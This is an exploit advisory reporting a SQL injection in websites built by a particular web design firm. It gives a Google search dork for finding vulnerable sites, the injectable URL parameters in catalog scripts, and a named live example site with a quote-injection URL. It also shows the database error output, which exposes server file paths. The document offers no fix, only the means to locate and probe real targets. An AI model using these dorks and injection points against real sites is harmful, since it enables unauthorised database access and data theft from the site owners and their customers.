#################################################################################################
# Exploit Title : Site Created by Frontline Multimedia Design Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : frontlinemultimedia.com ~ frontlinehosting.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Site Created by FRONTLINE MULTIMEDIA DESIGN''
# Exploit :
/catalog/main.php?cat_id=[SQL Injection]
/PATH/main.php?cat_id=[SQL Injection]
/catalog/product.php?cat_id=[ID-NUMBER]&pid=[SQL Injection]
/PATH/product.php?cat_id=[ID-NUMBER]&pid=[SQL Injection]
#################################################################################################
# Example Site => italdecorltd.com/catalog/main.php?cat_id=206%27
# SQL Database Error =>
FATAL [256] SELECT * FROM categories WHERE category_id = '206'' [nativecode=1064 **
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''206''' at line 1]
In file: /home3/italdecorltd/public_html/catalog/lib/SupportTools.php; line: 150
Called from: /home3/italdecorltd/public_html/catalog/lib/CCategory.class.php; function: dbQuery; line: 38
Called from: /home3/italdecorltd/public_html/catalog/main.php; function: CCategory; line: 111
URL: http://www.italdecorltd.com/catalog/main.php?cat_id=206%27
FATAL [256] SELECT * FROM products, product_categories WHERE product_categories.product_id = 2404' AND products.product_id =
product_categories.product_id [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' AND products.product_id = product_categories.product_id' at line 1]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################